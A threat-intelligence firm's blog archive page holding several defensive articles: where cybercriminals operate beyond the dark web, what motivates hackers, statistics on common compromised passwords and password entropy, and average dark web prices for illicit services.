Customer portal
Articles Tagged with

SOS Inteliigence Investigation

"Cyber
Investigation, Opinion

Beyond the Dark Web: Where Threat Actors Operate

by Daniel Collyer
July 18, 2025

The “dark web” has become something of a buzzword in recent years, often portrayed as the hidden underworld of the internet where cybercriminals operate in complete anonymity. For many, it conjures images of secret marketplaces, illicit data dumps, and hard-to-trace communications — all out of reach from the average internet user.

Because of this perception, it is a common misconception that all threat actor activity takes place exclusively on the dark web. While it certainly plays a role in enabling criminal operations, the truth is far more complex. Today’s threat actors are increasingly making use of platforms that are readily available, user-friendly, and in many cases, completely legal.

Much of their coordination, recruitment, and even data leakage now takes place in plain sight — across encrypted messaging apps, public forums, and mainstream social media platforms. Understanding where these actors truly operate is critical for any organisation looking to stay ahead of the threat landscape.

The Evolving Landscape of Threat Actor Platforms

The way threat actors communicate and coordinate has shifted significantly in recent years. Once heavily reliant on hidden services accessed through the Tor network, many cybercriminals are now embracing more accessible, mainstream platforms to conduct their activities.

This change has been driven by several key factors. One of the most prominent is the increased pressure from law enforcement. High-profile takedowns of dark web marketplaces such as AlphaBay and Hydra have disrupted long-standing criminal ecosystems, forcing actors to reconsider where and how they operate.

At the same time, modern platforms offer features that make them attractive to malicious users. Encrypted messaging apps provide a level of privacy that rivals, and in some cases exceeds, what is available on the dark web. Public forums and chat platforms are easy to access, require minimal technical knowledge, and can reach large audiences quickly.

For cybercriminals, scale and convenience matter. Hosting content on widely used services allows them to cast a broader net, whether they’re distributing stolen data, selling malware, or recruiting new affiliates. The lines between the open internet and covert criminal spaces are increasingly blurred, making it more difficult for defenders to track activity using traditional dark web monitoring alone.

Alternative Threat Actor Channels

While the dark web still plays a role in cybercriminal operations, many threat actors now prefer more accessible and user-friendly platforms. These alternatives offer speed, scalability, and often a surprising degree of anonymity — all without the need for specialised browsers or infrastructure. Below are some of the most commonly used non-dark web channels.

Telegram

Telegram has become a go-to platform for cybercriminals. With its end-to-end encryption, support for large group chats, and the ability to create private or public channels, it offers the ideal environment for discreet coordination at scale.

Threat actors use Telegram to:

  • Leak stolen data and documents
  • Advertise and sell credentials or access to compromised systems
  • Host scam pages or phishing kits
  • Organise affiliate networks or ransomware-as-a-service (RaaS) operations

Its minimal moderation and vast global user base make it a particularly attractive choice for cybercrime groups.

Discord and Other Chat Platforms

Originally designed for online gaming communities, Discord has evolved into a full-featured communication tool with support for text, voice, and private servers. Unfortunately, these same features have also made it a popular haven for fraudsters and cybercriminals.

Threat actors use Discord to:

  • Create closed communities centred around fraud, hacking tools, or data leaks
  • Share resources in “plug” communities — often focused on carding, identity theft, or botnet services
  • Coordinate attacks or distribute malware through seemingly innocuous links

Other platforms such as Tox, Matrix, and IRC-based services are also used, albeit with smaller user bases.

Surface Web Forums

Despite the risks of being in plain sight, many cybercrime forums continue to operate openly on the surface web. These forums are often language-specific or focused on particular sectors, such as financial fraud, social engineering, or credential stuffing.

They are typically used to:

  • Trade tools, tactics, and stolen data
  • Post tutorials or share exploit code
  • Vet and recruit participants for more private activities

Some forums operate with limited moderation or are hosted in jurisdictions with lax enforcement, allowing them to persist despite ongoing attention from security professionals.

Social Media (Twitter/X, Facebook, etc.)

Social media platforms remain surprisingly popular for certain types of threat actor activity. On services like Twitter/X, Facebook, and even LinkedIn, cybercriminals can quickly build audiences, push propaganda, or leak stolen information to make a statement.

Common uses include:

  • Publicly claiming responsibility for attacks or breaches
  • Promoting data leaks to gain notoriety or apply pressure to victims
  • Running influence campaigns or disinformation efforts
  • Recruiting low-level actors or collaborators

While these platforms generally respond quickly to takedown requests, the speed at which content can be published and spread makes them a persistent threat vector.

Paste Sites and Temporary File Hosts

Pastebin-style sites and ephemeral file hosting services continue to be used by cybercriminals to share content without needing to manage infrastructure. These services are often exploited to distribute:

  • Malware payloads
  • Indicators of compromise (IOCs)
  • Stolen credentials or internal documentation

Examples include Pastebin, Ghostbin, file.io, and anonfiles (when active). Their simplicity and temporary nature make them appealing for one-off drops or fast-moving campaigns.

Why the Shift Away from the Dark Web?

While the dark web once provided the primary infrastructure for cybercriminal marketplaces and forums, it has become a less attractive option for many threat actors. A combination of practical challenges and strategic advantages has led to a growing preference for mainstream and surface-level platforms.

One of the key drivers behind this shift is the increasing success of global law enforcement operations. High-profile takedowns such as AlphaBay, Hansa, and Hydra have not only dismantled major criminal marketplaces but also sown distrust within dark web communities. With undercover operations and seizures now a recurring threat, many actors perceive mainstream platforms as less risky in terms of operational security, particularly when combined with disposable accounts and encrypted messaging.

Technical reliability is another issue. Dark web services can suffer from poor uptime, slow performance, and hosting instability. These problems make it harder for threat actors to run consistent operations or maintain communication, especially when compared to the seamless experience offered by platforms like Telegram or Discord.

Accessibility also plays a major role. Mainstream platforms are far easier to use and require no special configuration or tools. Anyone with a smartphone can join a Telegram group or browse a fraud forum hosted on the surface web. This lowers the barrier to entry for newer or less technically skilled actors, fuelling growth in cybercriminal communities.

Finally, these platforms offer scale. Social media, public channels, and open forums provide instant access to large audiences, whether for pushing stolen data, coordinating campaigns, or recruiting collaborators. The potential for amplification far exceeds what is typically possible within the confines of the dark web.

For all these reasons, the dark web is no longer the sole or even primary location for cybercriminal activity. Threat actors are adapting to a broader, more dynamic digital environment, and defenders must do the same.

Implications for Threat Intelligence Teams

As threat actors diversify their platforms, the scope of effective cyber threat intelligence (CTI) must evolve accordingly. Relying solely on dark web monitoring is no longer sufficient. Instead, teams must broaden their visibility to include the various surface and semi-private spaces where cybercriminal activity increasingly takes place.

Monitoring closed channels such as Telegram groups, Discord servers, and niche forums has become essential. However, these spaces are often harder to access and require greater care in terms of operational security (OPSEC). Joining or observing these groups can carry significant risk if not done properly. Analysts must use hardened environments, anonymous accounts, and clear protocols to avoid detection or legal exposure.

Language skills and cultural awareness are also becoming increasingly important. Many cybercrime communities operate in non-English languages and use regional slang or coded terminology. Without this context, valuable intelligence can be missed or misinterpreted. Investing in native language analysts or translation tools can dramatically improve coverage and insight.

The scale and speed at which content is published across platforms make manual monitoring impractical. As such, automation is vital. Tools that scrape and index Telegram posts, track mentions on social media, or flag emerging IOCs can help intelligence teams respond quickly and reduce the chance of missing key developments.

Ultimately, the shift in threat actor behaviour demands a shift in defender strategy. The more fragmented and accessible the threat landscape becomes, the more agile and well-equipped CTI teams need to be in order to stay ahead.

Case Examples

LockBit’s Use of Telegram for PR and Leak Amplification (2024)

In early 2024, after suffering internal leaks and DDoS attacks against their dark web leak site, the LockBit ransomware group turned to Telegram to regain control of their narrative. The group created public Telegram channels to share statements, leak victim data, and coordinate with affiliates. This move not only ensured continuity during technical outages but also expanded their audience beyond the dark web’s limited reach.

Telegram’s encryption, ease of access, and built-in forwarding features allowed LockBit to amplify their message rapidly, including to journalists, researchers, and rival threat actors. It showcased a tactical shift: using mainstream tools as a parallel infrastructure for both influence and extortion pressure.

“Infinity Stealer” Malware Sold via Discord and GitHub (Mid–2023 Onwards)

Infinity Stealer, a malware strain targeting browser credentials and crypto wallets, began circulating heavily in 2023 via non-dark web platforms, notably Discord and GitHub. The malware was marketed in private Discord servers where prospective buyers were vetted and provided updates. GitHub repositories were used to host payloads, configuration templates, and instructions, often disguised as open-source tools.

This campaign highlights how cybercriminals are bypassing traditional marketplaces entirely, instead using legitimate platforms for both sales and delivery infrastructure. Discord’s private server structure and GitHub’s reputational cover enabled the operators to fly under the radar while still reaching a large pool of technically capable users.

Conclusion

The dark web remains a valuable source of cyber threat intelligence — but it is no longer the whole story. As cybercriminals adapt to a shifting digital landscape, they are increasingly leveraging open and semi-closed platforms like Telegram, Discord, and even mainstream social media to conduct and promote their activities.

For CTI teams, this evolution demands a broader approach. Effective monitoring now extends beyond Tor and onion domains to include a mix of channels, each with its own risks, nuances, and intelligence value. It also requires enhanced OPSEC, linguistic awareness, and the integration of automation tools to track activity at scale.

By recognising these trends and adapting monitoring strategies accordingly, defenders can stay better aligned with the current threat environment — one that is faster, more fragmented, and no longer confined to the shadows.

"Why
Investigation, Opinion

Why Hackers Hack: Exploring What Motivates Cybercriminal Activity

by Daniel Collyer
July 9, 2025

Cybercrime continues to rise in scale, complexity and impact, affecting individuals, businesses and governments alike. While much attention is given to how attacks happen, it’s just as important to ask why they occur in the first place. Understanding what motivates attackers is a crucial part of building an effective defence.

So, why do hackers hack?

Some are driven by financial gain, while others act on behalf of a nation-state or in support of a political cause. There are those motivated by revenge or personal challenge, and others who simply exploit opportunities because they can.

In this post, we explore the key motivations behind cybercriminal activity, helping you better understand the intent behind the threat and its implications for your organisation’s security posture.

Financial Gain

For many cybercriminals, money is the primary motivator. The vast majority of cybercrime is financially driven, with threat actors seeking to extract value from individuals, businesses or governments through theft, fraud or extortion.

Ransomware is perhaps the most well-known example. Attackers encrypt a victim’s data and demand payment, usually in cryptocurrency, in exchange for the decryption key. The rise of Ransomware-as-a-Service (RaaS) has made these attacks more accessible, allowing less technically skilled criminals to launch sophisticated campaigns using tools developed by others.

One of the most notorious examples of financially motivated cybercrime is Evil Corp, a Russia-based cybercrime group responsible for developing and distributing the Dridex banking Trojan and BitPaymer ransomware. The group, led by Maksim Yakubets, has been linked to attacks that have caused hundreds of millions of pounds in damages globally. According to the U.S. Department of the Treasury, Yakubets was allegedly tasked by Russian intelligence to conduct espionage operations alongside his cybercriminal activities. He is known not just for the scale of his crimes, but also for flaunting his wealth—reportedly driving a Lamborghini with a personalised number plate that reads “THIEF”.

Phishing and business email compromise (BEC) are also common financially motivated attacks. These techniques are designed to trick victims into handing over login credentials, payment details or other sensitive information that can be monetised directly or resold on dark web marketplaces. The FBI has reported billions of dollars in losses from BEC schemes, which often involve attackers impersonating executives or suppliers to redirect large financial transactions.

What’s particularly concerning is how mature and professionalised the cybercriminal ecosystem has become. Online forums and marketplaces, often hosted on the dark web, serve as thriving hubs where criminals buy and sell tools, data and services. This includes malware, exploit kits, stolen credentials and even technical support for other attackers. Some actors specialise in initial access, others in data theft or extortion, and many operate purely as brokers or facilitators.

As a result, modern cyberattacks are rarely the work of a lone hacker. Instead, they often involve multiple actors working together across a decentralised and anonymous marketplace. For a relatively low cost, almost anyone can purchase the tools and expertise needed to carry out a breach.

With high rewards and limited risk in many jurisdictions, financially motivated cybercrime remains one of the most significant threats facing organisations today.

Ideological or Political Motivation (Hacktivism)

Not all cybercriminals are driven by profit. Some are motivated by political beliefs, social causes or ideologies. These individuals or groups, often referred to as hacktivists, use hacking as a form of protest, aiming to disrupt, expose or embarrass organisations and governments they oppose.

One of the most recognisable hacktivist collectives is Anonymous, a loosely organised group known for its cyber campaigns against governments, corporations and extremist groups. Their activities have ranged from distributed denial of service (DDoS) attacks on financial institutions, to leaking sensitive documents from law enforcement agencies and political bodies.

Hacktivism has also played a prominent role in modern conflicts. In the early days of the Russia–Ukraine war, groups on both sides of the conflict engaged in cyber operations. Ukrainian-aligned actors, including the so-called IT Army of Ukraine, targeted Russian government websites and media outlets with defacements and DDoS attacks. Meanwhile, pro-Russian hacktivist groups like Killnet have launched attacks against European infrastructure in retaliation for political support of Ukraine.

These operations are not always highly technical, but they can be disruptive and attention-grabbing. For example, in 2022, Killnet claimed responsibility for attacks on several websites belonging to airports, healthcare providers and public institutions across Europe, using basic but effective DDoS techniques.

Hacktivism can blur the line between political protest and criminal activity. While some view it as a legitimate form of dissent in the digital age, it often involves illegal access, data leaks or service disruption, and can escalate geopolitical tensions or cause collateral damage to innocent third parties.

For defenders, politically motivated attacks pose a unique challenge. They may not follow the typical patterns of financially driven crime, and their targets can shift quickly based on current events, perceived injustices or ideological trends.

State-Sponsored Espionage

Some of the most advanced and persistent cyber threats come not from criminals seeking profit, but from nation-states pursuing strategic objectives. These attacks are often aimed at gathering intelligence, disrupting rivals, or gaining long-term access to critical systems. Unlike financially motivated actors, state-sponsored groups tend to operate with significant resources, patience and stealth.

These threat actors—often referred to as Advanced Persistent Threats (APTs)—typically target government departments, defence contractors, critical national infrastructure, and major corporations. Their goal may be to steal sensitive data, conduct surveillance, interfere with democratic processes, or enable future sabotage.

A prominent example is APT29, also known as Cozy Bear, a group linked to Russia’s Foreign Intelligence Service (SVR). They have been implicated in numerous high-profile intrusions, including the 2020 SolarWinds supply chain attack, which compromised several US federal agencies and global private sector organisations. The operation was notable for its sophistication and subtlety, remaining undetected for months.

Similarly, APT10, associated with China’s Ministry of State Security, was involved in an extensive global cyber espionage campaign targeting managed service providers (MSPs). By compromising these third-party IT providers, APT10 was able to access a wide range of downstream client networks, including government and corporate systems in the UK, US and beyond.

Unlike typical cybercriminals, these groups are often protected by their host governments and operate with impunity. They may also work in parallel with criminal organisations, blurring the lines between state and non-state activity. For example, some ransomware attacks have been linked to actors with suspected ties to nation-states, suggesting a dual-purpose intent: generating revenue while causing strategic disruption.

The motivations behind state-sponsored cyber operations are diverse, ranging from political influence and military advantage to intellectual property theft and economic gain. These campaigns are rarely random; they are calculated, well-resourced and long-term in nature.

For organisations, this means traditional defences may not be enough. Combating espionage-level threats requires a heightened focus on detection, incident response and threat intelligence, particularly for those in sensitive sectors.

Corporate or Industrial Espionage

Businesses, particularly those with valuable intellectual property and trade secrets, are prime targets for corporate or industrial espionage. Cybercriminals and competing organisations alike seek to gain an unfair advantage by stealing sensitive data related to research and development (R&D), product designs, strategic plans or proprietary technologies.

This type of espionage often overlaps with state-sponsored cyber operations, where nation-states target foreign companies to bolster their own industries or military capabilities. A notable example is the Operation Aurora campaign, uncovered in 2010, where threat actors believed to be linked to China targeted Google and dozens of other major companies. The attackers aimed to steal intellectual property and gain access to corporate networks.

Similarly, in 2021, the US Department of Justice indicted members of a Chinese hacking group known as APT41 for conducting widespread cyber intrusions into video game companies and technology firms, stealing source code and proprietary information to benefit commercial interests.

R&D-heavy sectors such as biotechnology, aerospace, automotive and software development face particularly high risks. The theft of trade secrets not only undermines a company’s competitive edge but can also result in substantial financial losses and damage to reputation.

Unlike typical financially motivated attacks, corporate espionage campaigns are usually stealthy and meticulously planned. Attackers may maintain prolonged access to compromised networks, gathering intelligence over months or even years to extract maximum value.

Organisations must therefore prioritise safeguarding their intellectual property through robust cybersecurity measures, employee awareness, and stringent access controls. Collaboration with industry partners and government agencies can also help in detecting and mitigating these sophisticated threats.

Personal Challenge or Prestige

For some hackers, the motivation is less about money or politics and more about curiosity, thrill-seeking, or the desire for recognition within their communities. These individuals often see hacking as a puzzle to be solved or a challenge to be conquered, gaining personal satisfaction and prestige among peers.

This motivation is particularly common among younger or amateur hackers, sometimes referred to as “script kiddies”, who may lack advanced skills but are eager to prove themselves by exploiting vulnerabilities or defacing websites. The hacking community online—including forums, social media groups and dark web marketplaces—can foster this behaviour, offering a platform for sharing exploits, bragging rights and reputation-building.

A notable example is the hacktivist group LulzSec, which gained international attention in 2011 through a series of high-profile attacks targeting organisations like Sony, the CIA, and PBS. Their actions were largely driven by the desire to embarrass their victims and entertain themselves, rather than for financial gain or political objectives.

Similarly, the case of Jonathan James, a teenage hacker from the United States, illustrates this motivation. At just 15 years old, James infiltrated several government systems, including NASA, stealing source code and causing significant disruption. His actions seemed motivated by the challenge and thrill of hacking rather than monetary rewards.

While these hackers might not always intend serious harm, their actions can have unintended consequences: disrupting services, compromising data, or exposing vulnerabilities that other malicious actors might exploit.

Revenge or Personal Grievances

Not all cyber threats originate externally—sometimes the greatest risks come from insiders motivated by personal grudges or feelings of revenge. Disgruntled employees, former staff or contractors with authorised access can deliberately cause harm to an organisation by leaking sensitive information, sabotaging systems or stealing data.

One of the most infamous cases involved Edward Snowden, a former NSA contractor who leaked vast amounts of classified information, motivated by a personal belief that the public had the right to know about government surveillance programmes. Though his actions sparked worldwide debate on privacy, they also caused significant damage to intelligence operations.

In the corporate sphere, a UK-based case saw a former IT administrator take revenge after being dismissed by deleting critical files and disabling user accounts, resulting in days of downtime and financial loss.

Such incidents highlight the critical importance of internal controls, thorough monitoring and robust offboarding procedures. Regularly reviewing access rights, implementing the principle of least privilege, and monitoring unusual activity can help detect and prevent insider threats before they escalate.

Organisations must balance trust with vigilance, fostering a positive workplace culture while ensuring employees understand the consequences of malicious actions.

Opportunistic or Accidental Hacking

Not all cyberattacks are the result of carefully planned operations. Many stem from opportunistic or accidental hacking, where attackers use automated tools to scan large numbers of systems for common vulnerabilities. These attacks require minimal effort but can still cause significant damage, especially to organisations or individuals with poor basic cyber hygiene.

Automated bots and scripts regularly probe the internet for unpatched software, weak passwords, misconfigured devices, or open ports. Once a vulnerability is found, the attacker may exploit it to gain access, often without a specific target in mind. This “spray and pray” approach relies on volume rather than precision.

For example, the WannaCry ransomware outbreak in 2017 rapidly spread across the globe by exploiting a known Windows vulnerability. Many affected organisations had failed to apply critical patches, making them vulnerable to this widespread, indiscriminate attack.

These types of attacks highlight the importance of fundamental cybersecurity practices: regularly updating software, using strong, unique passwords, enabling multi-factor authentication, and maintaining good network hygiene. Even basic measures can significantly reduce the risk posed by opportunistic attackers.

While opportunistic hacking might lack the sophistication or motive of targeted attacks, its impact can be equally devastating if proper precautions are not taken.

Mixed Motivations

In reality, cybercriminal motivations are often complex and overlapping rather than clear-cut. Many attacks are driven by a combination of factors—financial, political, ideological, or personal—which can make attribution and defence especially challenging.

A common scenario involves financially motivated cybercriminal groups being hired or tolerated by state actors to carry out attacks that serve national interests. These groups operate with relative impunity in exchange for providing offensive cyber capabilities or disruptive services.

For example, the notorious ransomware group REvil (also known as Sodinokibi) has been linked to criminal operations that sometimes intersect with geopolitical objectives. While primarily motivated by profit through ransomware extortion, there are indications that some affiliates have conducted operations aligning with certain state interests or received indirect protection from their home governments.

Such hybrid motivations complicate the threat landscape, blurring the lines between organised crime and state-sponsored espionage or sabotage. For defenders, understanding these intertwined incentives is crucial for developing effective cyber defence strategies and threat intelligence.

Conclusion

Cybercriminals are motivated by a wide and varied range of factors—from financial gain and political agendas to personal grudges and the pursuit of prestige. Understanding these diverse motivations is essential for organisations seeking to build effective defences in an increasingly complex cyber threat landscape.

By recognising what drives threat actors, businesses and individuals can better anticipate potential attack vectors, prioritise security investments, and tailor their incident response strategies accordingly. A threat-informed defence approach goes beyond technical measures, incorporating intelligence, awareness and proactive risk management.

As cyber threats continue to evolve, adopting a comprehensive, informed security posture is no longer optional—it is vital. Organisations should take active steps to understand their adversaries, strengthen their defences, and cultivate a culture of vigilance to stay ahead in the ongoing battle against cybercrime.

Header Photo by Furkan Elveren on Unsplash

"Compromised
Uncategorized

Compromised Password Analysis

by Daniel Collyer
March 28, 2024

How threat actors target your credentials and what you can do to protect yourself

Across the dark web, and shadier parts of the clear web, there is a booming marketplace for compromised credentials.  Threat actors are looking to make a quick return can monetise your sensitive data, leaving you vulnerable to further compromise.  So how do threat actors get ahold of your credentials, and what can you do to protect yourself?

How do threat actors get your credentials?

Threat actors have an arsenal of tools and techniques for obtaining credentials to facilitate further criminal activity. These range from the highly technical to meticulously researched to plain and simple brute force.  We discuss a sample of these techniques below to assist you in understanding how threat actors can obtain your credentials.

Malware

For the more technically-minded, malware can be utilised to intercept passwords being input across the internet, or just simply to steal passwords from your device.

A “man-in-the-middle” attack sees a threat actor tactically position themself between a victim and the service the victim is accessing.  While the victim is inputting their credentials, the threat actor can see the input and capture this for their use.  This technique has commonly been utilised with banking trojan’s, such as TrickBot.

Once installed on a victim’s device, TrickBot would identify when victims attempted to access banking services online and provide them with a cloned website, controlled by the threat actor.  Subsequently, they would then be able to see what the victim was typing, thereby gaining access to their login details.  To preserve the illusion that nothing was amiss, the threat actor would then redirect the victim to the legitimate site as if they were logged in.  The threat actor would then capture the victim’s credentials, allowing them to log in whenever they saw fit.

Infostealer malware is much simpler.  Once installed on a device, it can quickly query common areas of a device used for password storage, and send this data to a waiting server controlled by a threat actor.  Owing to the various deployment methods used, threat actors can quickly generate a large volume of content from infostealer malware.  This content is then sorted and sold online, or at times even given away.  Further information regarding infostealer malware can be found in our article here.

Phishing

Phishing requires an element of trickery from the threat actor.  In this situation, they are portraying themselves as something they aren’t to trick the victim into divulging their credentials.  This can often be in the form of messages (email, SMS etc) asking victims to clarify their credentials associated to a legitimate service, i.e. banking, or premium services such as Netflix.  The threat actor will also provide a convenient link for the victim however, this link will invariably lead to a cloned website controlled by the threat actor, who can then collect credentials as victims input them.

Social Engineering

Remembering passwords for all the different services we use can be tiresome.  It has been estimated that the average person has over 100 passwords to remember.  Therefore it’s only natural that we utilise the things in our lives that matter most when coming up with passwords.  Significant dates, names of pets, and our favourite locations.  All can be useful when creating passwords as you’re more likely to remember these details.

The problem comes with our online activity.  Many people are very public about what they post online, and we talk about the things we like and what’s important to us.  If we’re then using those important things to generate our passwords, it becomes very easy for threat actors to do a little research into us to discover those passwords for themselves.

As an example, we have identified within our data collections that “fiona2014” is one of the most commonly used passwords.  If someone were to be using this password, it could be very easy to use social engineering to obtain it.  It would be straightforward to talk to someone, engage them about their life, and quickly find out they have a daughter called Fiona who is 10 years old.  Putting these details together we can come to “fiona2014”.

Dictionary Attacks

We are inundated with accounts requiring passwords, so it is common for people to use simple passwords to avoid having to remember anything too complex.  Threat actors rely on this as the basis for a “dictionary attack”.  Years of data regarding passwords has allowed for generating files containing thousands of common passwords and their variants.  These files then allow a threat actor to query a service, armed with a victim’s email address, and try each password until the service allows them to log in.

Thankfully, dictionary attacks are somewhat easier to defend against.  Most services will now only allow a few login attempts before any suspicious activity is flagged and the account is locked down.  Threat actors will constantly look for methods to bypass this security, so the best option is to keep those passwords unique.

Brute Force

When finesse will not work, take a sledgehammer to the door.  Brute force requires a threat actor to have some coding knowledge.  They can write code which will query a service to attempt a login, but instead of being more methodical, this method is more trial and error.  Commonly, brute force attacks will iterate through millions of potential combinations to find the correct password (assuming that any security the service has does not lock the account down).  This method can be more easily defeated by using longer, more complex passwords, and we will explain why shortly.

Brute force attacks can also occur when a threat actor obtains a username:password combination for a particular site.  Banking on poor password hygiene, they will attempt the same combination across multiple sites to see if there has been any password reuse.

What happens when your credentials are compromised

What happens when credentials are compromised depends on who the victim is.

Compromise of personal accounts tends to provide threat actors with access to various services and information, including the victims’ banking, online shopping, premium entertainment services etc.  These have some value to others, who may want the benefits of those services without having to pay, e.g. to watch Netflix, listen to Spotify etc.  These types of data will often be grouped and sold in bulk on online forums for a fraction of the cost of the service they give access to.

Real value for threat actors comes from compromised corporate accounts.  These accounts allow a threat actor to access a corporate system, giving them a platform to launch further criminal activity.  There is an entire marketplace dedicated to gaining initial access to corporate systems – initial access brokerage – and depending on the size of the victim, can bring in thousands of pounds for the threat actor selling credentials.  Such access can be a precursor to more serious cybersecurity events, such as data theft/loss, or the deployment of ransomware.

Password hygiene and habits

Now for the statistics.

We have taken a sample of data collated by SOS intelligence in March 2024, totalling over 10 million passwords obtained by infostealer malware.

The most common password length was 8 characters, with an average length across the dataset of 10.5.  This was to be expected as 8 characters is often presented as a minimum across many password policies.  Additionally, it’s also the number of characters in “password”…

Top 20 most common passwords
PasswordCount
12345651022
admin22322
https16682
1234567816525
12345678915737
123458958
Profiles8611
password6533
Opera3946
12345678903326
1231233093
12345672923
Aa1234562866
Kubiak222821
Pass@1232761
Password2665
1111112488
fiona20142206
123456789102043
P@ssw0rd2029

On that note, the word “password”, and numerous variants utilising common character substitutions, appeared over 37,000 times.  “admin” appeared more than 22,000 times, while “https” was used more than 16,000 times.  This is concerning as dictionary attacks will often focus on keywords such as this first, knowing they are so common.  “admin” is frequently used as a default password on routers and other IoT devices which highlights the ongoing vulnerability of these devices.

In total, approximately 1 million passwords contained only digits, while approximately another 1 million contained only letter characters.  Overall, over 7.5 million passwords contained no special characters.

So the fundamental question is, why are these statistics important, and how can we use them to improve our password hygiene?

Password strength works based on “entropy” – the measure of randomness or uncertainty of the password.  Password entropy allows us to quantify the difficulty or effort required to guess, or “crack”, a password using brute force or other similar methods.  As a general rule, higher entropy passwords are deemed stronger and more secure.

We measure entropy in bits. The number of bits a password has indicates how strong it is.  The basic formula for calculating entropy looks like this:

 Entropy = log2​(NL)

Where:

  • N is the number of possible characters in the character set used for the password
  • L is the length of the password (in characters)
  • log2 is the base-2 logarithm

Taking this formula we can see that the longer a password is, and the more characters it pools from, the higher entropy it will have.  We can visualise this with our data.

Using a length of 8 (being the most commonly seen) we can see the entropy when different sizes of character sets are used:


NumericalSingle CaseAll CaseAlphanumericAlphanumeric w/ Special Characters
Total # of characters1026526292
Entropy26.5837.6045.6047.6352.19

If we increase the password length to 12, strength increases significantly:


NumericalSingle CaseAll CaseAlphanumericAlphanumeric w/ Special Characters
Total # of characters1026526292
Entropy39.8656.4168.4171.4578.28

Based on the above, working at 1000 guesses per second, a brute force attack on an 8-character numerical password would take about 27 hours.  However, a similar attack on a 12-character password utilising alphanumeric and special characters would take roughly 11.5 billion years!

The key factor to note here is that there is a reason we’re always asked for longer passwords with uppercase, lowercase, numbers and special characters – they’re that much stronger and secure.

So a crucial question remains; what should be done with this information?  We sincerely hope that what we’ve discussed here will highlight the need for strong and enforced password policies.  These should factor in the following:

  • Use of alphanumeric and special characters
  • Mandatory lengths (at least 10, but longer is better)
  • No password reuse
  • Frequent and enforced password changing.

Wherever possible, we would highly recommend the use of password managers.  They can save a lot of time for users, allow for significantly more complex passwords to be used, and only require the user to remember one password.  We don’t recommend using one product over another, but one such example would be KeePassXC.  KeePassXC is a host-based password vault which keeps passwords encrypted when not in use.  It offers numerous options for password generation, varying on characters used, length etc.  The benefits of this are that you can generate passwords up to 128 characters long, which simply need to be copied and pasted whenever they are required.  Here is one such example with an entropy value of 715:

J4kKutHec3RYxQo3kpm4mot5EAVp&opRCSr&x4J5r%fQ$XxzrjdW2ZgRg@k42XhA@zz`S4ofiR4~^s`&43zZ@JQ&qQ$Mad2^jtQdHSZ@hbJbVk5Qabvs5Kc$KW3#W@Rm

What our external research shows

Research conducted by NordPass in 2022 identified that the average person has approximately 100 user accounts requiring password verification.  This is the most probable cause for password reuse and password fatigue; where users are exasperated by the constant need to generate unique strong passwords and fall into a habit of using weak, easy-to-remember passwords, or reusing old ones. Verizon’s Data Breach Investigations Report, published in 2021, estimates that 80% of hacking-related breaches were a result of stolen or brute-forced credentials.  This number could be significantly reduced by ensuring and maintaining good password hygiene.

Forgetting passwords can have a significant impact on the password owner, the services they use, and the organisations they work for:

  • Research firm Forrester has indicated that, for some organisations, the costs associated with handling password resets could be up to $1 million USD per year.  Gartner estimates that around 40% of help desk queries in large companies relate to password resets, taking up a substantial part of billable work, and taking focus away from more business-critical support.
  • In 2017, MasterCard and the University of Oxford published a study looking at users of online shopping platforms.  Their research indicates that 33% of users would abandon a purchase if they could not remember an account password, while 19% would abandon a purchase while waiting for a password reset link.
  • Chainalysis, a cryptocurrency data firm, estimates that 20% of all mined Bitcoin are locked in lost or otherwise inaccessible wallets.  In one such example, one user has 7002 Bitcoins locked within a hard drive, which risks being encrypted following two more incorrect password attempts.

What is SOS Intelligence doing, and how can it benefit you?

At SOS Intelligence, we understand the risk that credential theft can pose to the security of your data.  What we can provide is early detection for when your data has been exposed. 

We are actively collecting and analysing stolen credentials from multiple sources which feeds into our intelligence pipeline.  Within moments of ingestion, we can generate bespoke alerts for you to indicate when you may be at risk.  Early detection is vital to allow you to take action before an issue becomes serious and impactful against your business.

If you are serious about your cyber security, why not book a demo?

Photos by Ed Hardie on Unsplash,  Ryunosuke Kikuno on Unsplash, Joshua Hoehne on Unsplash

"Dark
Investigation, The Dark Web

Dark Web Services Current Average Prices

by Amir Hadzipasic
December 14, 2022

It started with a tweet.

The dark web has long been associated with illegal activities and the sale of illicit goods and services. Among the many services offered on the dark web, hacking services are particularly prevalent.

Daniel’s tweet

We had our PIR and got to writing an Intelligence Requirements sheet following the PESTLEP model and that allowed us to prioritise our Collection Plan.

Collection plan.

With which we were able to start our collection process and begin answering Daniel Card’s Tweet.

The collection process consisted of using the SOS Intelligence platform to identify current active market places for the specific IR areas we had to answer to.

Our platform has the capability to scan the dark web very quickly, with the ability to rotate around all active Onion services within 24-48 hours. This gives us a clear view of current and active Onion services.

In addition SOS Intelligence has a broad range of automatic closed and open forum collection giving us a real time view into purchases and sales.

Gathering the relevant information and calculating averages per service, per market place. 

The research

The research for this article looked at around 40 different current dark web marketplaces and clear web and dark web forums, where hacking services are commonly offered for sale. The average prices for the services mentioned were determined based on the information gathered from these sources.

According to our research, the average price for a stolen credit card on the dark web is around $243.15.

This may seem like a low price, but the value of a stolen credit card can vary depending on the country it was issued in and the remaining balance on the card. For example, a credit card from the United States may be worth more than one from a less economically developed country. To keep things as like for like as possible we took the average card limit for a USA bank.

Counterfeit money is also commonly available on the dark web, with the average price per $1,000 coming in at around $396.24.

This may seem like a high price, but it’s important to remember that producing high-quality counterfeit money can be a time-consuming and expensive process.

Botnets, which are networks of compromised computers used to launch distributed denial of service (DDoS) attacks, are also commonly available on the dark web.

The average price for a botnet or DDoS attack is around $382.41.

Another common service offered on the dark web is the sale of  so called residential proxies,  which are more difficult to detect and block as they “proxy” a cyber criminals connection out through a residential ISP. These proxies are used to mask the true IP address of the user and are often used by hackers to avoid detection.

The average price for a residential proxy is around $645 per month.

Finally, initial access to a target network is often available for sale on closed forums and marketplaces. This can include login credentials or vulnerabilities in a network that can be exploited to gain access, Initial Access or AI is typically the first ‘open door’ into a victim’s network and can lead to ransomware.

Prices for this service ranged wildly from a few hundred dollars to tens of thousands, due to wide ranging victims and seller motivations, varying greatly depending on access offered, method of access and compromised company.

The average price for initial access to a network is around $7,700. 

In conclusion, the dark web is a hub for a wide range of hacking services, from stolen credit card information to initial access to target networks.

While the prices for these services may seem steep, it’s important to remember that at least for some of the services offered there is a more demand than supply.

It is also important to note that there is no guarantee with any of the services provided and the sellers or marketplaces themselves could be scams or scammers although a majority do offer purchase through escrow.

Header photo by Jefferson Santos on Unsplash.

"SOS
Investigation

Investigation into the RM3Loader lnk delivery with a Michael Page recruitment campaign theme

by Amir Hadzipasic
September 29, 2022

